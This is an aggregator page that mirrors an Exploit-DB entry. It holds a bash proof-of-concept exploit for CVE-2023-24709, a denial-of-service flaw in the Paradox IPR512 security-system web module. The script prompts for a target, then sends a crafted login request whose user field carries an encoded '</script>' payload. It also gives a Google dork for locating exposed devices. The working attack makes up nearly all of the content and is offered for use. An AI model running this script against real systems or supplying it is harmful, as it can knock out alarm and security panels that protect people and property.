4
[dos] Paradox Security Systems IPR512 - Denial Of Service
source link: https://www.exploit-db.com/exploits/51356
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Paradox Security Systems IPR512 - Denial Of Service
Exploit:
/
#!/bin/bash
# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
# Version: IPR512
# CVE : CVE-2023-24709
# Function to display banner message
display_banner() {
echo "******************************************************"
echo "* *"
echo "* PoC CVE-2023-24709 *"
echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *"
echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"
echo "* by SlashXzerozero *"
echo "* *"
echo "******************************************************"
}
# Call the function to display the banner
display_banner
echo ""
echo ""
echo "Please enter a domain name or IP address with or without port"
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain
# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
if [[ $confirm == "Y" || $confirm == "y" ]]; then
# Display loading animation
animation=("|" "/" "-" "\\")
index=0
while [[ $index -lt 10 ]]; do
echo -ne "Loading ${animation[index]} \r"
sleep 1
index=$((index + 1))
done
# Use curl to send HTTP GET request with custom headers and timeout
response=$(curl -i -s -k -X GET \
-H "Host: $domain" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
-H "Accept: */" \
-H "Referer: http://$domain/login.html" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Connection: close" \
--max-time 10 \
"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")
# Check response for HTTP status code 200 and print result
if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
else
echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"
fi
else
echo "The script is stopped!."
fi
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK